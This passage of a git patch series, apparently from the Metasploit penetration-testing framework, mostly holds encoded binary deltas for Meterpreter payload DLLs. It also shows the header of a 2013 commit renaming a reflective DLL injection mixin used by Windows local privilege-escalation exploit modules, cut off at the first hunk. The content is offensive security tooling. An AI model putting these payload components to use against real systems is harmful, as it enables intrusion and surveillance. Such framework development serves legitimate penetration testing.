zVq0+dN{GxKMH3LudqGN8!M*z-p{_e!-N)Sp?rL`vTz$%`SWc)k5S!NWeb7#4<m;M7
zGw5`>f^MO0SRxz4mOx>&;TnI8k3=<g@)kNrx?idPZUmk()69T9&Awsxhh+Xt+>gL%
zIvt!v&I;#o@8bEPQa5bElxBFw2apYi!{MKhBV;>rS`2g8D3;AuumnWP;gBhxfL!?W
zd%+mS86VnL#CZ34cai(HyUX3{N^7b-n5IN)F<KK0*wz89jTWcLT0^AFC+Qjtqj`J*
zU#_p$_d&_r0E_Dl$}!ELR&P+q@z#r0rj>0?g})9Wyj-&++iyqMb?qoS+K#b@fLe^P
zQ|&bSko`R-9>PUk5hbG0i3cJ0<cd55prsI~tH3YTi|fMg1R|We4&H7n4waJel<nj%
zWI@ujm!Wu;X@@~Uf7in4AkgKdv?==+yA3(v5B|2^+;{_tR5mZ04J>Xcc2kGC54!!`
z6n7Z-?JV>eX#TQLsSMW)m21iE<-YPHMA<jw)$$hkJGrltqKr|VSF!@&@N<*}N`bOc
zS*L76{QDO|@LA=Oat+-ok~Ac(NgOCgF8PW4M(TlHOi^d5^VF5<cJ-(#Y0cp~s##ih
zt+)0#q*@x{-ZX86wjPo0oaSlER=hp*V>+~B0o3DqzLoEX{Q8Ms=YGAm9<cRq^<;#H
zlg1Qtrn%F+XeL@C(HXzCE?M{3o1lg|IvbsDJUIe-6)M@-OjnwsFBFn(=;MdTaCIUE
zR6DIZ;^v=hHh+`1)fHXn-7vy`(c2npja!kJrHWAeu>eU5%5TbxAZ6Y~ELbhC3&@4?
zCV88@6IpMzvP>yd%9SYc6j^Rx@op&L>vZ@(Nlrq?8%-9H<K(orXo=NIZ~sX||FdcZ
z1goU^y{pG!9T=Mt=qsrp=jm1kCYZ2Piu{sd424t~W28c^q#GIF71_pAqxK9V2LUqI
z$TNZiH-sJWUO9`$S}!(5VzVf&oM5W#Bf*VDVfTCYPO7^1B@h5_$}1j<GSQoBO2OAX
zaUZ`~7lgQp+1iXVHAsuX68ykLNJvc3*ckRu{aCOLS<#hv@X;itZ{fU+VH@#od?vmw
zh)V=dZU~zY{Ag2HQUF#CzI};J1{!_7nyco6MU{d@m8s=;Wbc7%Mo}9rUP}P88l$Bm
z=}pygk@)h_e~Xdy_Gu@z(^>_lL1K{U5|H1LX<rC~5j2ga(`-5wnJt$V(Q<kPqgiKt
zSqdA$Qinq=WUw40sa1%-C)sJtOtj&N$Udo{Lu){WD)==Xqqm0cN&(Nz$E49wcq6t_
zZ>7Myc}6~_(L9|cnXwR9Ddrf6!ewTuc^We>ZLCCVs5PRn{+6(;5UdQ%*%~$|aI&(=
z!zx8@F`l&;QUya?_(eqZK#mbjM675n+K4zI3k`zaMt1TVpc_PeGRWURks^j7ON|k!
zB2A==43R0a#Z)mv<cRq<g@E;<s(o*oNDPR>;;1+&PK&dmLR=D8Fo`8Oey1u#L_0A~
z6DJl4uZ<Ju$Ox0VV>|JXjEPP+C&@{6`Z@!h6h!J7P9CE5W@nFc*16(bb0pXA#=5OR
zr6s&W?Y$+rOj)I@fp#xaHY>$SiBhWUQOcA+IVQG_V)&m%0H{C+xPl-MLFz(_M3WfO
zgv3?`1DPBpCrJ*QkH*P^lGum2(kLFs6VN=}coLeZFJ@*__)v(6F=(zd4E_wB$+P)X
p%+uyz8Yve-Iv)gL8DCW`rZ<C3l+?n^(jK(zK3;h2ntxWve*tk@u?zqJ

diff --git a/data/meterpreter/metsrv.x64.dll b/data/meterpreter/metsrv.x64.dll
index 9068259a475b155137d9ff1d4db6fce18389abe3..6dc9743a18e0d3fedfa95b6df756e4ac08ff3557 100755
GIT binary patch
delta 3947
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

delta 3881
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

diff --git a/data/meterpreter/metsrv.x86.dll b/data/meterpreter/metsrv.x86.dll
index 91f367cd7e9ffabe24e5e93625621f73649d6dae..aeb272a4b6c03984d5a205709ad3fb9f269f9390 100755
GIT binary patch
delta 2389
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
bO1G7rF4H?JoliIiopI+mXIxrmw6^>QQi*nm

delta 2284
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

diff --git a/data/meterpreter/screenshot.x64.dll b/data/meterpreter/screenshot.x64.dll
index c192eb02b4946313ef3ef161f3f48f1a3775f5ca..5b95b74cd479897c2905743488c8caf3a1c1f885 100755
GIT binary patch
delta 42
wcmZqJz|*jSX8|K~@5y<SnHhbV?A|m7F}4RWGHwrIWLk6)B)<LoB_>W+08d^J7ytkO

delta 42
wcmZqJz|*jSX8|Mgzh^CznHhbV-l{bRF}4RWGHwrIWLk6)B)<LoB_>W+0AU*t=>Px#

diff --git a/data/meterpreter/screenshot.x86.dll b/data/meterpreter/screenshot.x86.dll
index ac20375a8d62de918cbcccff77ed1849d4d679c7..1b47d33810e2c3f7f40c87832df994590df843a2 100755
GIT binary patch
delta 42
wcmZqJz|*jSX8|L#!O3}(nHhbV4$o>1Vr&m$WZWLa$TaCWNPPSA7fh1+07b12mjD0&

delta 42
wcmZqJz|*jSX8|Mg{%0+dnHhbV)?RH6Vr&m$WZWLa$TaCWNPPSA7fh1+0AVo@-~a#s


From 7e8db8662e96c153318066bb36e52445a3be2e6c Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Wed, 4 Dec 2013 22:18:29 +1000
Subject: [PATCH 170/217] Update name of the mixin

Changed `RdiMixin` to `ReflectiveDLLInjection`.
---
 lib/msf/core/payload/windows/x64/reflectivedllinject.rb | 2 +-
 lib/msf/core/rdi_mixin.rb                               | 2 +-
 modules/exploits/windows/local/ms10_015_kitrap0d.rb     | 2 +-
 modules/exploits/windows/local/ppr_flatten_rec.rb       | 2 +-
 modules/post/windows/manage/reflective_dll_inject.rb    | 2 +-
 5 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/lib/msf/core/payload/windows/x64/reflectivedllinject.rb b/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
index c63d0ed97e..58f3a9bde6 100644
--- a/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
+++ b/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
@@ -15,7 +15,7 @@ module Msf
 
